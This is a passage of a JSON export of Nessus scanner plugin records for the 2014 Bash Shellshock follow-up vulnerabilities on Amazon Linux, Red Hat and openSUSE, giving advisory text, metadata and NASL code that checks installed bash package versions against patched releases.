Copyright (C) 2012-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Solaris Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", 
\"Host/Solaris/showrev\");\n\n exit(0);\n}\n\nexit(0, \"This plugin has been deprecated. Consult specific patch-revision plugins for patch 126546 instead.\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:24:18", "description": "GNU Bash through 4.3 bash43-025 processes trailing strings after certain malformed function definitions in the values of environment variables, which allows remote attackers to write to files or possibly have unknown other impact via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution.\n\nNOTE: this vulnerability exists because of an incomplete fix for CVE-2014-6271 and this bulletin is a follow-up to ALAS-2014-418.\n\nIt was discovered that the fixed-sized redir_stack could be forced to overflow in the Bash parser, resulting in memory corruption, and possibly leading to arbitrary code execution when evaluating untrusted input that would not otherwise be run as code.\n\nAn off-by-one error was discovered in the way Bash was handling deeply nested flow control constructs. Depending on the layout of the .bss segment, this could allow arbitrary execution of code that would not otherwise be executed by Bash.\n\nSpecial notes :\n\nBecause of the exceptional nature of this security event, we have backfilled our 2014.03, 2013.09, and 2013.03 Amazon Linux AMI repositories with new bash packages that also fix both CVE-2014-7169 and CVE-2014-6271 .\n\nFor 2014.09 Amazon Linux AMIs, 'bash-4.1.2-15.21.amzn1' addresses both CVEs. Running 'yum clean all' followed by 'yum update bash' will install the fixed package.\n\nFor Amazon Linux AMIs 'locked' to the 2014.03 repositories, 'bash-4.1.2-15.21.amzn1' also addresses both CVEs. 
Running 'yum clean all' followed by 'yum update bash' will install the fixed package.\n\nFor Amazon Linux AMIs 'locked' to the 2013.09 or 2013.03 repositories, 'bash-4.1.2-15.18.22.amzn1' addresses both CVEs. Running 'yum clean all' followed by 'yum update bash' will install the fixed package.\n\nFor Amazon Linux AMIs 'locked' to the 2012.09, 2012.03, or 2011.09 repositories, run 'yum clean all' followed by 'yum\n--releasever=2013.03 update bash' to install only the updated bash package.\n\nIf you are using a pre-2011.09 Amazon Linux AMI, then you are using a version of the Amazon Linux AMI that was part of our public beta, and we encourage you to move to a newer version of the Amazon Linux AMI as soon as possible.", "cvss3": {}, "published": "2014-10-12T00:00:00", "type": "nessus", "title": "Amazon Linux AMI : bash (ALAS-2014-419)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6271", "CVE-2014-7169", "CVE-2014-7186", "CVE-2014-7187"], "modified": "2022-01-31T00:00:00", "cpe": ["p-cpe:/a:amazon:linux:bash", "p-cpe:/a:amazon:linux:bash-debuginfo", "p-cpe:/a:amazon:linux:bash-doc", "cpe:/o:amazon:linux"], "id": "ALA_ALAS-2014-419.NASL", "href": "https://www.tenable.com/plugins/nessus/78362", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux AMI Security Advisory ALAS-2014-419.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(78362);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/31\");\n\n script_cve_id(\"CVE-2014-7169\", \"CVE-2014-7186\", \"CVE-2014-7187\");\n script_xref(name:\"ALAS\", value:\"2014-419\");\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n\n script_name(english:\"Amazon Linux AMI : bash (ALAS-2014-419)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Amazon 
Linux AMI host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"GNU Bash through 4.3 bash43-025 processes trailing strings after\ncertain malformed function definitions in the values of environment\nvariables, which allows remote attackers to write to files or possibly\nhave unknown other impact via a crafted environment, as demonstrated\nby vectors involving the ForceCommand feature in OpenSSH sshd, the\nmod_cgi and mod_cgid modules in the Apache HTTP Server, scripts\nexecuted by unspecified DHCP clients, and other situations in which\nsetting the environment occurs across a privilege boundary from Bash\nexecution.\n\nNOTE: this vulnerability exists because of an incomplete fix for\nCVE-2014-6271 and this bulletin is a follow-up to ALAS-2014-418.\n\nIt was discovered that the fixed-sized redir_stack could be forced to\noverflow in the Bash parser, resulting in memory corruption, and\npossibly leading to arbitrary code execution when evaluating untrusted\ninput that would not otherwise be run as code.\n\nAn off-by-one error was discovered in the way Bash was handling deeply\nnested flow control constructs. Depending on the layout of the .bss\nsegment, this could allow arbitrary execution of code that would not\notherwise be executed by Bash.\n\nSpecial notes :\n\nBecause of the exceptional nature of this security event, we have\nbackfilled our 2014.03, 2013.09, and 2013.03 Amazon Linux AMI\nrepositories with new bash packages that also fix both CVE-2014-7169\nand CVE-2014-6271 .\n\nFor 2014.09 Amazon Linux AMIs, 'bash-4.1.2-15.21.amzn1' addresses both\nCVEs. Running 'yum clean all' followed by 'yum update bash' will\ninstall the fixed package.\n\nFor Amazon Linux AMIs 'locked' to the 2014.03 repositories,\n'bash-4.1.2-15.21.amzn1' also addresses both CVEs. 
Running 'yum clean\nall' followed by 'yum update bash' will install the fixed package.\n\nFor Amazon Linux AMIs 'locked' to the 2013.09 or 2013.03 repositories,\n'bash-4.1.2-15.18.22.amzn1' addresses both CVEs. Running 'yum clean\nall' followed by 'yum update bash' will install the fixed package.\n\nFor Amazon Linux AMIs 'locked' to the 2012.09, 2012.03, or 2011.09\nrepositories, run 'yum clean all' followed by 'yum\n--releasever=2013.03 update bash' to install only the updated bash\npackage.\n\nIf you are using a pre-2011.09 Amazon Linux AMI, then you are using a\nversion of the Amazon Linux AMI that was part of our public beta, and\nwe encourage you to move to a newer version of the Amazon Linux AMI as\nsoon as possible.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://aws.amazon.com/amazon-linux-ami/faqs/#lock\");\n script_set_attribute(attribute:\"see_also\", value:\"https://alas.aws.amazon.com/ALAS-2014-418.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://alas.aws.amazon.com/ALAS-2014-419.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Run 'yum update bash' to update your system. 
Note that you may need to\nrun 'yum clean all' first.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/10/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:bash\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:bash-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:bash-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 Tenable Network Security, Inc.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(release) || !strlen(release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nos_ver = pregmatch(pattern: \"^AL(A|\\d)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nos_ver = os_ver[1];\nif (os_ver != \"A\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux AMI\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (rpm_check(release:\"ALA\", reference:\"bash-4.1.2-15.21.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", 
reference:\"bash-debuginfo-4.1.2-15.21.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"bash-doc-4.1.2-15.21.amzn1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bash / bash-debuginfo / bash-doc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:23:43", "description": "[Updated September 30, 2014] This advisory has been updated with information on restarting system services after applying this update.\nNo changes have been made to the original packages.\n\nUpdated bash packages that fix one security issue are now available for Red Hat Enterprise Linux 5, 6, and 7.\n\nRed Hat Product Security has rated this update as having Important security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section.\n\nThe GNU Bourne Again shell (Bash) is a shell and command language interpreter compatible with the Bourne shell (sh). Bash is the default shell for Red Hat Enterprise Linux.\n\nIt was found that the fix for CVE-2014-6271 was incomplete, and Bash still allowed certain characters to be injected into other environments via specially crafted environment variables. An attacker could potentially use this flaw to override or bypass environment restrictions to execute shell commands. Certain services and applications allow remote unauthenticated attackers to provide environment variables, allowing them to exploit this issue.\n(CVE-2014-7169)\n\nApplications which directly create bash functions as environment variables need to be made aware of changes to the way names are handled by this update. 
Note that certain services, screen sessions, and tmux sessions may need to be restarted, and affected interactive users may need to re-login. Installing these updated packages without restarting services will address the vulnerability, but functionality may be impacted until affected services are restarted. For more information see the Knowledgebase article at https://access.redhat.com/articles/1200223\n\nNote: Docker users are advised to use 'yum update' within their containers, and to commit the resulting changes.\n\nFor additional information on CVE-2014-6271 and CVE-2014-7169, refer to the aforementioned Knowledgebase article.\n\nAll bash users are advised to upgrade to these updated packages, which contain a backported patch to correct this issue.", "cvss3": {}, "published": "2014-09-26T00:00:00", "type": "nessus", "title": "RHEL 5 / 6 / 7 : bash (RHSA-2014:1306)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6271", "CVE-2014-7169", "CVE-2014-7186", "CVE-2014-7187"], "modified": "2023-04-25T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:bash", "p-cpe:/a:redhat:enterprise_linux:bash-debuginfo", "p-cpe:/a:redhat:enterprise_linux:bash-doc", "cpe:/o:redhat:enterprise_linux:5", "cpe:/o:redhat:enterprise_linux:6", "cpe:/o:redhat:enterprise_linux:6.5", "cpe:/o:redhat:enterprise_linux:7", "cpe:/o:redhat:enterprise_linux:7.3", "cpe:/o:redhat:enterprise_linux:7.4", "cpe:/o:redhat:enterprise_linux:7.5", "cpe:/o:redhat:enterprise_linux:7.6", "cpe:/o:redhat:enterprise_linux:7.7"], "id": "REDHAT-RHSA-2014-1306.NASL", "href": "https://www.tenable.com/plugins/nessus/77895", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2014:1306. 
The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(77895);\n script_version(\"1.39\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/04/25\");\n\n script_cve_id(\"CVE-2014-7169\", \"CVE-2014-7186\", \"CVE-2014-7187\");\n script_bugtraq_id(70137, 70152, 70154);\n script_xref(name:\"RHSA\", value:\"2014:1306\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n\n script_name(english:\"RHEL 5 / 6 / 7 : bash (RHSA-2014:1306)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Red Hat host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"[Updated September 30, 2014] This advisory has been updated with\ninformation on restarting system services after applying this update.\nNo changes have been made to the original packages.\n\nUpdated bash packages that fix one security issue are now available\nfor Red Hat Enterprise Linux 5, 6, and 7.\n\nRed Hat Product Security has rated this update as having Important\nsecurity impact. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available from the\nCVE link in the References section.\n\nThe GNU Bourne Again shell (Bash) is a shell and command language\ninterpreter compatible with the Bourne shell (sh). Bash is the default\nshell for Red Hat Enterprise Linux.\n\nIt was found that the fix for CVE-2014-6271 was incomplete, and Bash\nstill allowed certain characters to be injected into other\nenvironments via specially crafted environment variables. An attacker\ncould potentially use this flaw to override or bypass environment\nrestrictions to execute shell commands. 
Certain services and\napplications allow remote unauthenticated attackers to provide\nenvironment variables, allowing them to exploit this issue.\n(CVE-2014-7169)\n\nApplications which directly create bash functions as environment\nvariables need to be made aware of changes to the way names are\nhandled by this update. Note that certain services, screen sessions,\nand tmux sessions may need to be restarted, and affected interactive\nusers may need to re-login. Installing these updated packages without\nrestarting services will address the vulnerability, but functionality\nmay be impacted until affected services are restarted. For more\ninformation see the Knowledgebase article at\nhttps://access.redhat.com/articles/1200223\n\nNote: Docker users are advised to use 'yum update' within their\ncontainers, and to commit the resulting changes.\n\nFor additional information on CVE-2014-6271 and CVE-2014-7169, refer\nto the aforementioned Knowledgebase article.\n\nAll bash users are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/articles/1200223\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/errata/RHSA-2014:1306\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2014-7169\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2014-7186\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2014-7187\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected bash, bash-debuginfo and / or bash-doc packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n 
script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/09/26\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:bash\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:bash-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:bash-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6.5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.7\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2023 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(5|6|7)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 5.x / 6.x / 7.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2014:1306\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"bash-3.2-33.el5_11.4\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"bash-3.2-33.el5_11.4\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"bash-3.2-33.el5_11.4\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", 
reference:\"bash-debuginfo-3.2-33.el5_11.4\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"bash-debuginfo-3.2-33.el5_11.4\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"bash-debuginfo-3.2-33.el5_11.4\")) flag++;\n\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"bash-4.1.2-15.el6_5.2\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"bash-4.1.2-15.el6_5.2\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"bash-4.1.2-15.el6_5.2\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"bash-debuginfo-4.1.2-15.el6_5.2\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"bash-debuginfo-4.1.2-15.el6_5.2\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"bash-debuginfo-4.1.2-15.el6_5.2\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"bash-doc-4.1.2-15.el6_5.2\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"bash-doc-4.1.2-15.el6_5.2\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"bash-doc-4.1.2-15.el6_5.2\")) flag++;\n\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"bash-4.2.45-5.el7_0.4\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"bash-4.2.45-5.el7_0.4\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"bash-debuginfo-4.2.45-5.el7_0.4\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"bash-debuginfo-4.2.45-5.el7_0.4\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"bash-doc-4.2.45-5.el7_0.4\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"bash-doc-4.2.45-5.el7_0.4\")) flag++;\n\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested 
= pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bash / bash-debuginfo / bash-doc\");\n }\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-28T14:22:37", "description": "The command-line shell 'bash' evaluates environment variables, which allows the injection of characters and might be used to access files on the system in some circumstances (CVE-2014-7169).\n\nPlease note that this issue is different from a previously fixed vulnerability tracked under CVE-2014-6271 and it is less serious due to the special, non-default system configuration that is needed to create an exploitable situation.\n\nTo remove further exploitation potential we now limit the function-in-environment variable to variables prefixed with BASH_FUNC_ . This hardening feature is work in progress and might be improved in later updates.\n\nAdditionally two more security issues were fixed in bash:\nCVE-2014-7186: Nested HERE documents could lead to a crash of bash.\n\nCVE-2014-7187: Nesting of for loops could lead to a crash of bash.", "cvss3": {}, "published": "2014-09-29T00:00:00", "type": "nessus", "title": "openSUSE Security Update : bash (openSUSE-SU-2014:1229-1) (Shellshock)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6271", "CVE-2014-7169", "CVE-2014-7186", "CVE-2014-7187"], "modified": "2022-12-05T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:bash", "p-cpe:/a:novell:opensuse:bash-debuginfo", "p-cpe:/a:novell:opensuse:bash-debuginfo-32bit", "p-cpe:/a:novell:opensuse:bash-debugsource", "p-cpe:/a:novell:opensuse:bash-devel", "p-cpe:/a:novell:opensuse:bash-lang", "p-cpe:/a:novell:opensuse:bash-loadables", "p-cpe:/a:novell:opensuse:bash-loadables-debuginfo", "p-cpe:/a:novell:opensuse:libreadline6", "p-cpe:/a:novell:opensuse:libreadline6-32bit", "p-cpe:/a:novell:opensuse:libreadline6-debuginfo", "p-cpe:/a:novell:opensuse:libreadline6-debuginfo-32bit", 
"p-cpe:/a:novell:opensuse:readline-devel", "p-cpe:/a:novell:opensuse:readline-devel-32bit", "cpe:/o:novell:opensuse:12.3"], "id": "OPENSUSE-2014-563.NASL", "href": "https://www.tenable.com/plugins/nessus/77966", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2014-563.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(77966);\n script_version(\"1.21\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\n \"CVE-2014-6271\",\n \"CVE-2014-7169\",\n \"CVE-2014-7186\",\n \"CVE-2014-7187\"\n );\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0240\");\n\n script_name(english:\"openSUSE Security Update : bash (openSUSE-SU-2014:1229-1) (Shellshock)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote openSUSE host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The command-line shell 'bash' evaluates environment variables, which\nallows the injection of characters and might be used to access files\non the system in some circumstances (CVE-2014-7169).\n\nPlease note that this issue is different from a previously fixed\nvulnerability tracked under CVE-2014-6271 and it is less serious due\nto the special, non-default system configuration that is needed to\ncreate an exploitable situation.\n\nTo remove further exploitation potential we now limit the\nfunction-in-environment variable to variables prefixed with BASH_FUNC_\n. 
This hardening feature is work in progress and might be improved in\nlater updates.\n\nAdditionally two more security issues were fixed in bash:\nCVE-2014-7186: Nested HERE documents could lead to a crash of bash.\n\nCVE-2014-7187: Nesting of for loops could lead to a crash of bash.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.novell.com/show_bug.cgi?id=898346\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.novell.com/show_bug.cgi?id=898603\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.novell.com/show_bug.cgi?id=898604\");\n script_set_attribute(attribute:\"see_also\", value:\"https://lists.opensuse.org/opensuse-updates/2014-09/msg00039.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected bash packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Qmail SMTP Bash Environment Variable Injection (Shellshock)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/09/29\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bash\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bash-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bash-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bash-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bash-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bash-lang\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bash-loadables\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bash-loadables-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreadline6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreadline6-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreadline6-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreadline6-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:readline-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:readline-devel-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:12.3\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 and is owned by Tenable, Inc. 
